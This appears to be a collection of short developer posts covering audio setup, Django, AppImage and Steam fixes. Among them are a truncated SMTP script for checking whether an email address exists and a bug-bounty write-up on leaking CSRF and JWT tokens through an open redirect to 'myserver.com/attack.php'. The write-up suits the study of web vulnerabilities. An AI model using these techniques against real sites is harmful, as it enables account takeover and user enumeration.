stefanocoding

#!/usr/bin/python3
# Example usage: ./does_email_address_exist.py twitter.com jack
import argparse
from smtplib import SMTP
import dns.resolver

parser = argparse.ArgumentParser() 
parser.add_argument('hostname')
parser.add_argument('user')
args = parser.parse_args()

stefanocoding

1. Open qjackctl
2. Click Setup...
3. Choose "alsa" as the Driver
4. Choose the analog interface as the Interface (in my case it is hw:PCH,0)
5. Go to the Advanced tab
6. Enter the number of inputs in the first textbox next to Channels I/O (2 in my case)
7. Enter the number of outputs in the second textbox next to Channels I/O (2 in my case)
8. Click OK
9. Click Start
10. Start Bitwig and select "JACK" as the Driver model

stefanocoding

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
2. User loads https://example.com/?code=VALUE
3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user

   GET /verify/VALUE HTTP/1.1
   Host: example.com
   

stefanocoding

I needed to use a TextInput in a CreateView for a ManyToManyField and I couldn't find a simple good solution. After looking through the Django source code I noticed that value_from_datadict() is used for ManyToManyField inputs.

In the forms.py file you need something like:

from django.forms import ModelForm, TextInput
from .models import Product

class ManyToManyInput(TextInput):
  def value_from_datadict(self, data, files, name):
 value = data.get(name)

stefanocoding

If you need/want to generate an AppImage for Bitwig on a non-Debian Linux:

1. Download or clone https://github.com/AppImage/pkg2appimage
2. If you don't have Docker installed, install it
3. Start Docker
4. Run ./pkg2appimage-with-docker recipes/Bitwig-Studio.yml (for some reason AppImage already has a recipe for Bitwig)
5. If it fails, and asks you to set the environment variable ARCH: add the line ENV ARCH=x86_64 (or your architecture) to ./Dockerfile, below DOCKER_BUILD=1

Just in case it's not clear: you have to follow the steps on a terminal, at least step 4.

stefanocoding

Solution to copy & paste on the Terminal

flatpak override --user --env=PROTON_NO_ESYNC=1 com.valvesoftware.Steam

Explanation

I tried to play World of Warships on Clear Linux using the flatpak of Steam, but the game never started. So, I ran flatpak run com.valvesoftware.Steam on the Terminal to see if there was any useful information. The error that called my attention was eventfd: Too many open files. I did a google search and found some mention about setting PROTON_NO_ESYNC=1 as an environment variable. So, I ran flatpak override --user --env=PROTON_NO_ESYNC=1 com.valvesoftware.Steam on the Terminal, to set the environment variable PROTON_NO_ESYNC=1 for com.valvesoftware.Steam. I tried again and it worked.